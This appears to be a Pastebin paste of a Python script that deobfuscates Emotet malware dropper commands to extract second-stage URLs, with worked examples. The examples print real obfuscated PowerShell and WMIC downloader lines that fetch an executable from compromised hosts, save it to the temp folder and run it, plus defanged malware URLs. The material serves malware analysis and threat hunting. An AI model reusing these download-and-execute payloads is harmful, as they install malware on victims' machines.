Spacing

Emotet Deobfuscator

Sep 25th, 2017
4,407
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 14.98 KB | None | 0 0
  1. import re
  2. import sys
  3.  
  4.  
  5. def main_menu():
  6.     print ("1. WMIC Format \n2. PowerShell Format\n3. Array Format\n")
  7.  
  8.     menu = raw_input("Enter Choice [1-3] : ")
  9.  
  10.     if menu == "1":
  11.         wmic_format()
  12.     elif menu == "2":
  13.         new_format()
  14.     elif menu == "3":
  15.         old_format()
  16.     else:
  17.         print ("Invalid Choice")
  18.         main_menu()
  19.  
  20.  
  21. def wmic_format():
  22.     # Gets the entire wmic input
  23.     a = raw_input("Enter the WMIC command\n")
  24.     # Finds the numbers in the wmic command and removes any single digit numbers
  25.     wmic = re.sub("\[.*?char.*?\]", "[char]", a, flags=re.I)
  26.     # Finds all of the numbers (char values)
  27.     wmic = re.findall('\d+', wmic)
  28.     # Only checks for characters greater than 10 (non NULL) and less than 127 (Max ASCII char)
  29.     wmic = [i for i in wmic if 30 <= int(i) < 127]
  30.     # Replaces any + symbol and ' symbol
  31.     a = a.replace("'", "").replace("+", "")
  32.     # Sends the string to remove the 3 digit chars, this is done twice to ensure all is caught
  33.     result = remove_chars(a, wmic)
  34.     result = remove_chars(result, wmic).replace(".", "[.]").replace("http://", "")
  35.     # Splits the results by =, displays what we think should be the http array (6)
  36.     x = 6
  37.     temp_result = result.split("=")
  38.     # If this is not the correct domain listing we have the choice to change which array is run through
  39.     print temp_result[x]
  40.     x = array_select(temp_result, x)
  41.     # If there are any other characters that were not removed this function will do so
  42.     print temp_result[int(x)]
  43.     extra_chars(result, x)
  44.     # After we get the good result this lets us restart the script if needed
  45.     menu_end()
  46.  
  47.  
  48. def new_format():
  49.     # Gets the user to input characters from 36 to 125
  50.     a = raw_input("Enter the numbers/characters from 36 to 125\n")
  51.     # Regular Expression looking for any numbers
  52.     a = re.findall('\d+', a)
  53.     # Joins the split characters, maps ints to char, then strips the http:// replaces . with [.] and splits the string
  54.     a = ''.join(map(lambda x: chr(int(x)), a)).replace(".", "[.]").replace("http://", "").split("'")
  55.     # Prints only the URLs (second array, since it is split by ')
  56.     print a
  57.     # After we get the good result this lets us restart the script if needed
  58.     menu_end()
  59.  
  60.  
  61. def old_format():
  62.     # Enter the character values in the brackets
  63.     a = raw_input("Enter the Character Values\n").replace("','", ";").split(";")
  64.     # Enters Integer array used to determine character placement
  65.     b = raw_input("Enter the Integer Array Output Sequence\n").split("{")
  66.     # Removes all brackets around the numbers
  67.     s = [s.replace('}', '') for s in b]
  68.     # Deletes the first blank array
  69.     del s[0]
  70.     # Outputs the blocks of characters in order forming URLs in stdout
  71.     for i in range(len(s)):
  72.         c = int(s[i])
  73.         sys.stdout.write(a[c].replace("'", "").replace(".", "[.]")),
  74.     # After we get the good result this lets us restart the script if needed
  75.     menu_end()
  76.  
  77.  
  78. def remove_chars(a, wmic):
  79.     # Runs a for loop looking for three characters to filter out of the string
  80.     for i in range(len(wmic) - 2):
  81.         num = chr(int(wmic[i]))
  82.         num2 = chr(int(wmic[i + 1]))
  83.         num3 = chr(int(wmic[i + 2]))
  84.         # Takes the characters and combines them into a 3 character string then removes them
  85.         num4 = num + num2 + num3
  86.         a = a.replace(num4, '')
  87.     return a
  88.  
  89.  
  90. def extra_chars(result, x):
  91.     # Since they are not always using [char] values some need to be manually entered
  92.     b = raw_input("Are there any more 3 character strings to replace? (y/n)\n").lower()
  93.     # This if statement allows the user to manually enter 3 characters (no error checking)
  94.     # then removes that from the string
  95.     if b.startswith('y'):
  96.         c = raw_input("Enter the characters to replace\n")
  97.         a = result.replace(c, '').replace("http://", "")
  98.         temp_result = a.split("=")
  99.         print temp_result[x]
  100.         extra_chars(a, x)
  101.     elif b.startswith('n'):
  102.         good_result = result.split("=")
  103.         printed_results = good_result[x].split("?")
  104.         print "\n".join(printed_results)
  105.     else:
  106.         print ("Invalid Choice")
  107.         extra_chars(result, x)
  108.  
  109.  
  110. def array_select(temp_result, x):
  111.     # This will allow the user to change which array is manipulated
  112.     # Emotet has changed from 10 to 6 recently so this is to help future proof the script
  113.  
  114.     # This is put in for the first run through, on first run X = 6
  115.     # If you enter an invalid choice it will be equal to n
  116.     if x != ('n'):
  117.         x = raw_input("Does this array display the domains? (y/n)\n")
  118.     if x.startswith('y'):
  119.         return True
  120.     if x.startswith('n'):
  121.         m = 1
  122.         for s in temp_result:
  123.             print m, s
  124.             m += 1
  125.         b = raw_input("What piece of the Array contains the URLs?\n")
  126.         try:
  127.             temp_result[int(b) - 1]
  128.             print temp_result[int(b) - 1]
  129.             y = raw_input("Does this array display the domains? (y/n)\n")
  130.             if y.startswith('y'):
  131.                 return int(b) - 1
  132.             if y.startswith('n'):
  133.                 array_select(temp_result, x)
  134.         except (IndexError, ValueError):
  135.             print "Invalid Array"
  136.             x = 'n'
  137.             array_select(temp_result, x)
  138.  
  139.  
  140. def menu_end():
  141.     # Allows script to be re-run for more decoding
  142.     e = raw_input("\n\nPress 1 to restart, any other key to quit\n")
  143.     if e == "1":
  144.         main_menu()
  145.     else:
  146.         exit(0)
  147.  
  148.  
  149. # Runs the main menu
  150. main_menu()
  151.  
  152.  
  153.  
  154.  
  155.  
  156.  
  157. ------------------------------------------------------------------------------
  158. An example of how this script works using the new wmic format
  159.  
  160. 1. WMIC Format
  161. 2. PowerShell Format
  162. 3. Array Format
  163.  
  164. Enter Choice [1-3] : 1
  165. Enter the WMIC command
  166. cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %CpPrlXwPi%=p^o^w^er&&set %ihOoOEWWJO%=^sh^ell&&!%CpPrlXwPi%!!%ihOoOEWWJO%! " (('iNvoK'+'e-ExprESsION (((sRI .sRI+sRI ((Get-VARIable KRh*MDR*KRh).name[3'+',11,2]-joInKsRI+sRIRhKRhsRI+sRI)( ((KR'+'sRI+sRIh& ( M3gENV:cOMSsRI+sRIPEC[4,26,25]-joINh'+'0Eh0E)sRI+sRI ( (hsRI+sRI0EDHyh0E+h0KRh+KRhEnsadasRI+sRIsh0E+h0Ed = &h0E+h0E(h0E'+'+h0ERujKRh+KRhnRuh0E+h0Ej+h0E+h0ERuh0E+hKRh+KRh0Ejh0E+h0Eeh0E+h0ERh0E+'+'h0Euj+Ru'+'jh0E+h0KRh+sRI+sRIKRhEw-objh0E'+'+KRh+'+'KRhh0Eeh0E+h0EcRuj+RujtRh0E+h0Euj) randomsRI'+'+sRI;DHyYYU = h0E+h0E.(RujneRuj+RujwRuj+h0E+h0ERuh0E+h0Ej-objectRh0EsRI+sRI+h0Eu'+'j) S'+'yh0E+h0Estem.Net.WebClieh0'+'E+h0Ent;DHyNSB = DHyh0E+h'+'0Ensad'+'h0E'+'+h0KRh+KRhEasdKRh+K'+'Rh.nextKRh+KRh(10000'+', '+'2821sRI+sRI'+'3'+'3);DHyADCX = Ru'+'j sRI+sRI htsRI+sRItp://tesh0E+h0Eth0E+h0E.magsRI+sRInh0E+h0EusRI+sRImsph0E+h0Eort.com'+'/k1u6dtwh0E+h0sRI+sR'+'IE/?httph0E+h0E:h0E+h0E//wwwh0'+'E'+'+hKRh+KRh0E.sbkh0E+h0Etraveh0E+hsRI+sRI0El.com.mysRI+sRI'+'h0E+s'+'RI+sRIh0E/MoGJD/?httph0E+h0E://doh0E+h0Erschdh0E'+'+h0Ei.com/ly4Ivh0E+h0E/'+'h0E+h0E?hsRI+sRI0E+h0Ehtth0E+sRI+sRIh0Ep:'+'//ww'+'w.hopadih0E+sRI+sRIhsRI+sRI0Elida.rosRI+sRI'+'/0LCh0E+sRI+sR'+'Ih0ETG2/h0E+h0E?h0E+h0Ehh0E+sRI+sRIhKRsRI+sRIh'+'+KRh0Ettp:/h0E+h0E/sph0E+h0sRI+sRIEortid.net/02wh0E+h0Edi/Ruj.h0E+h0ESplKRh+KRh'+'i'+'t(Ruj?sRI+sRIRusRI+sRIj);DHh0E+h0EySh0E'+'+h0EDh0E+h0'+'ECh'+'0E+h0'+'E = h0E+h0EDHyenh0E+h0Ev:p'+'ubh0E+h0E'+'lKRh+KRhih0E+h0Ec + Ruh0E+KRh+KRhh0KRh+KRhEjA0h0E+h0EGRuj + DHyNSB + (Rh0E+sRI+sRIh0Euj.sRI+sRIexRusRI+sRIj+Rujeh0E+h0ERuj)h0EsRI'+'+sRI+h0E;h0E+h0KRh+KRhEforeach(hsRI+sRI0E+h0EDHyah0E+h'+'0Esh0sRI+sRIE+KRh+K'+'Rhh0Efc inh0E+h0E h0E+h0EDHKRh+sRI+sRIKRhh0E+h0EyADCX)h0E+h0E{'+'trh0E+h0Eyh0E+h0E{DHyYYh0E+h0EU.Nd5DoyP4WnlyP4OasRI+sRIdFIh0E+h0EyP4leNd5(DHh0E+h0Ey'+'ah0EsRI+sRI+h0Esh0E+h0Efc.Nd5Toh0E+h0KsRI+'+'sRIRh+KRhESh0EKRh+KRh+h'+'0EtryPKRh+KRh4iyP4Nh0E+h0Egh0E+h0ENd5(), h0EKRsRI+sRIh+KRh+hsRI+sRI0EDHySDC);&sRI+sRI(RujInvoRuj+RujkRusRI+sRIjh0E+h0E+Ruje-Ih0E+h0Eth0E+h0EemRh0E+h0Eujh0E+hKRh+KRh0E)(DHySDC);brh0E+h'+'sR'+'I+sRI0Eeak;}catch{}}h0KRh+KRhE).replaCE(sRI+sRIh0EsRI+sRINd5h0E,[StrinG][c'+'HAr]34)'+'KRh+KRh.replaCE(h0EA0Gh0E,h0'+'E2oUh0E).replaCE(([cHArsRI+sRI]121'+'+sRI+sRI[cHAr]80+[cHAr]sRI+sRI52),[SKRh+KRhtrinG][cHAr]'+'96).replaCE(([cHAr]68+['+'cHAr]KRh+KR'+'h72+[cHAr]12KRh+KsRI+sRIRh1),[StrinG][cH'+'Ar]36).rep'+'laCE(sRI+sRI([cHAKRh+KRhr]82+[csRI+sRIHAr]'+'117+sRI+sRI[sRI+sRIcsRI+sRIHKRh+KRhAr]106),[StrinG][cHAr]39'+'KRh'+'+KRh) ) KRh) -crEpLAce ([ChAr]104+[ChAr]48+[ChAr]69)'+',[ChAr]39 -'+'crEpLAce ([ChAr]50+[ChAr]111+[ChAr]85),[ChAr]92'+' -REpLAcE([ChArsRI+sRI]77+[ChAr]5'+'1'+'+[ChAr]103),[ChAr]'+'36))sRI) -CrEPlACe ([CHAR]75+[CHA'+'R]82+[CH'+'AR]104),[CHAR]39) )')-crePlaCE([CHaR]115+[CHaR]82+[CHaR]73),[CHaR]39) |&( $PSHOme[4]+$psHome[30]+'x')
  167. Ruj  test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/Ruj[.]SplKRhKRhit(Ruj?Ruj);DHySDC
  168. Does this array display the domains?
  169. y
  170. Ruj  test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/Ruj[.]SplKRhKRhit(Ruj?Ruj);DHySDC
  171. Are there any more 3 character strings to replace? (y/n)
  172. y
  173. Enter the characters to replace
  174. Ruj
  175.   test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/[.]SplKRhKRhit(?);DHySDC
  176. Are there any more 3 character strings to replace? (y/n)
  177. y
  178. Enter the characters to replace
  179. hKR
  180.   test[.]magnumsport[.]com/k1u6dtw/?www[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?sportid[.]net/02wdi/[.]SplKRhit(?);DHySDC
  181. Are there any more 3 character strings to replace? (y/n)
  182. y
  183. Enter the characters to replace
  184. KRh
  185.   test[.]magnumsport[.]com/k1u6dtw/?www[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?sportid[.]net/02wdi/[.]Split(?);DHySDC
  186. Are there any more 3 character strings to replace? (y/n)
  187. n
  188. test[.]magnumsport[.]com/k1u6dtw/
  189. www[.]sbktravel[.]com[.]my/MoGJD/
  190. dorschdi[.]com/ly4Iv/
  191. www[.]hopadilida[.]ro/0LCTG2/
  192. sportid[.]net/02wdi/[.]Split(
  193. );DHySDC
  194.  
  195.  
  196.  
  197. An example of how this script works using the Join format
  198.  
  199. https://www.hybrid-analysis.com/sample/4cfd3f25f178f5ae5dd5c5438a4bc3cd0af2ca712a5a59388612697d4b4424d4?environmentId=100
  200.  
  201. base64 decoded and NUL characters removed provides this output
  202.  
  203. & ( $eNv:PubLIc[13]+$eNV:puBLic[5]+'X')( ( '36q119:115~99~114x105z112~116;32z61x32J110q101&119q45z111J98&106x101z99~116G32~45%67%111x109q79q98;106%101:99&116x32x87q83%99z114x105J112:116x46:83x104q101:108x108z59J36G119J101z98z99%108%105&101x110~116J32:61z32~110z101q119;45:111J98x106%101:99%116%32z83G121&115q116%101~109G46G78J101q116~46z87:101~98J67z108~105z101;110q116q59~36x114:97;110;100G111q109x32q61&32z110%101;119J45J111%98J106~101%99&116z32q114x97&110&100%111%109J59G36&117:114~108G115~32%61;32q39~104~116G116z112%58~47~47~98q97J103:112:114&105&110%116~101q114G46z99&111x109;47q105x47q44%104:116;116z112%58G47%47x98;114&111:97J100~97z118:101J110%117J101G46~99&111&109:46G97&117&47:67z82x47G44J104%116q116q112G58J47q47:115z112:121%114q97:108G119:101G98&46:99&111G109J47J105~110&118z97;114q47q110;107;108;79G105J77;47%44:104x116G116~112~58;47J47z102:99;116&100x101;118:46x99z111q109:47&120G98G117G121x88z47q44x104G116x116J112%58x47q47z99;98%111J120z46:100%107G47%118&85J83x106J65%122G86q71J114J47:39&46z83:112z108;105~116&40:39q44J39z41~59z36J110G97J109x101z32q61G32z36;114J97q110:100%111z109:46q110J101z120x116x40q49;44G32:54%53&53z51%54~41~59;36&112%97%116q104~32z61G32q36J101z110G118~58G116:101%109&112%32%43~32G39:92&39q32z43G32G36:110:97&109~101x32q43x32;39&46%101:120G101~39~59~102;111;114G101q97x99G104x40:36~117G114z108z32~105%110q32J36z117%114G108:115x41z123z116J114G121J123q36x119J101G98&99G108J105G101;110~116x46%68~111&119:110q108;111q97z100%70%105x108G101z40~36G117%114;108;46G84J111:83J116%114&105&110x103G40x41&44&32q36G112:97z116~104z41q59~83%116~97&114G116q45G80;114z111;99~101z115q115q32:36&112z97&116x104~59;98J114:101G97%107&59&125:99~97J116x99z104z123G119q114J105%116~101G45x104~111z115J116%32x36J95z46~69%120%99&101z112q116x105z111J110z46;77&101&115x115x97q103z101&59J125z125'-split'z' -SplIT'x' -sPLIT':' -SpLit'J' -sPLiT '&' -sPLIT';' -SplIT'%' -sPLIT '~'-SpLiT'q'-Split'G'|fOREacH-OBjecT {([char][iNT] $_) }) -jOIN '' )
  204.  
  205. Type 1 for New format
  206. Pate from the 36 until the 125 before the split (do not include the ' ')
  207. The script will provide you with an output of
  208. bagprinter[.]com/i/,broadavenue[.]com[.]au/CR/,spyralweb[.]com/invar/nklOiM/,fctdev[.]com/xbuyX/,cbox[.]dk/vUSjAzVGr/
  209. These are the new second-stage domains for the Emotet domains.
  210.  
  211.  
  212. This second example shows numbers only
  213.  
  214. https://www.hybrid-analysis.com/sample/0c34b872ba2266c2028e27c9fc9bed8fe9c6f04221695e19c5194200a9638d6e?environmentId=100
  215. base64 decoded and NUL characters removed provides this output
  216.  
  217. [CHar[]] (36, 119 , 115 , 99, 114, 105, 112,116,32, 61 ,32 , 110, 101 , 119 ,45,111, 98 ,106, 101 ,99 , 116,32 ,45, 67 ,111 , 109 , 79 ,98, 106 , 101 , 99 ,116,32,87,83,99 , 114 , 105 , 112 ,116, 46 ,83 , 104, 101 ,108 , 108 ,59, 36, 119 , 101 , 98, 99,108, 105 , 101 , 110 ,116, 32, 61 , 32, 110, 101,119, 45 ,111,98 ,106, 101 ,99 ,116,32 ,83,121 , 115 , 116 , 101,109 ,46 , 78 , 101 , 116, 46, 87 ,101, 98 ,67 ,108, 105,101, 110,116 , 59,36 ,114, 97 , 110 , 100 , 111,109,32,61, 32, 110,101 ,119 , 45,111 , 98 ,106 ,101 ,99 , 116 , 32,114, 97,110 ,100 ,111 , 109 , 59 , 36,117 , 114 ,108 ,115 ,32 ,61 , 32 ,39,104 , 116 ,116 ,112 ,58,47 ,47 , 103,97 , 109 ,109 , 101 ,108 , 103 ,114, 97, 118, 108, 105 ,110, 103 , 101 , 110, 46 ,99 , 111,109, 47,100 , 108, 84 ,77 ,104,47,44 , 104,116,116 , 112 , 58,47 , 47,97,99,101 , 106 , 97, 112, 97 , 110 , 46 ,110 , 101 ,116 , 47,98, 121 ,103 ,47 , 44 ,104,116 , 116 , 112, 58 , 47 , 47 ,70 , 108 ,111 , 114,105 ,115 ,115 ,97 ,110 , 116 , 70 , 105, 114, 101 ,46,99,111 ,109,47 ,97, 115, 112,110 ,101,116 ,95,99, 108 , 105 , 101 , 110 ,116, 47,71,99,99 ,119, 117, 111 ,102, 47, 44,104 ,116, 116,112 ,58,47,47 , 101,116,101,114 , 110, 97,108 ,97,109 ,111 , 117, 114 ,46, 99 , 111 , 109,47 ,66, 73 , 72,103 , 47,44 ,104, 116 ,116 ,112,58, 47,47,98 ,97,99, 104,117, 101 , 46,99 , 111,46 , 117 , 107 , 47 , 81, 74 ,47, 39,46 , 83, 112 ,108 , 105, 116 , 40,39 , 44 , 39 , 41,59 , 36, 110 ,97 ,109 , 101 ,32 ,61,32, 36 , 114 , 97, 110, 100 , 111 ,109 , 46,110 ,101 ,120 ,116 ,40 ,49, 44, 32,54 , 53, 53 , 51 ,54 ,41 ,59 , 36 ,112 , 97 ,116 ,104 , 32 ,61, 32 ,36,101,110 , 118, 58 ,116 , 101 ,109, 112 , 32 , 43, 32 , 39 , 92 , 39,32,43,32 , 36 ,110, 97 , 109,101 ,32 ,43, 32,39, 46, 101 ,120 ,101, 39 , 59, 102,111 ,114, 101,97 ,99, 104 ,40, 36 ,117, 114 ,108, 32,105 ,110 , 32 ,36, 117 ,114 , 108,115 , 41,123, 116 , 114 , 121 , 123 , 36 ,119 , 101,98 , 99,108 ,105 ,101,110 ,116 ,46 ,68 , 111 , 119 ,110, 108,111,97 , 100 ,70 , 105, 108 ,101 ,40 , 36 ,117 , 114 , 108 ,46 ,84,111,83 , 116 , 114, 105, 110 , 103 ,40 ,41, 44, 32 ,36,112, 97, 116 , 104 ,41 ,59 , 83 , 116 , 97, 114, 116 ,45,80 ,114,111, 99 , 101 ,115 , 115, 32 ,36,112, 97,116 ,104 , 59,98 , 114 , 101, 97,107 ,59 , 125, 99 ,97 ,116,99 , 104 , 123 ,119, 114 , 105 , 116 ,101 ,45,104,111 , 115 ,116 ,32,36, 95, 46 , 69 ,120 ,99 , 101,112, 116 , 105 ,111 ,110 ,46, 77 , 101 , 115 ,115 ,97 , 103,101, 59, 125, 125) -JoIN''| &( $shelliD[1]+$ShELlid[13]+'x')
  218.  
  219. Type 1 for New Format
  220. Pate from the 36 until the 125 (do not include the ())
  221. The script will provide you with an output of
  222. gammelgravlingen[.]com/dlTMh/,acejapan[.]net/byg/,FlorissantFire[.]com/aspnet_client/Gccwuof/,eternalamour[.]com/BIHg/,bachue[.]co[.]uk/QJ/
  223. These are the new second-stage domains for the Emotet domains.
Add Comment
Please, Sign In to add comment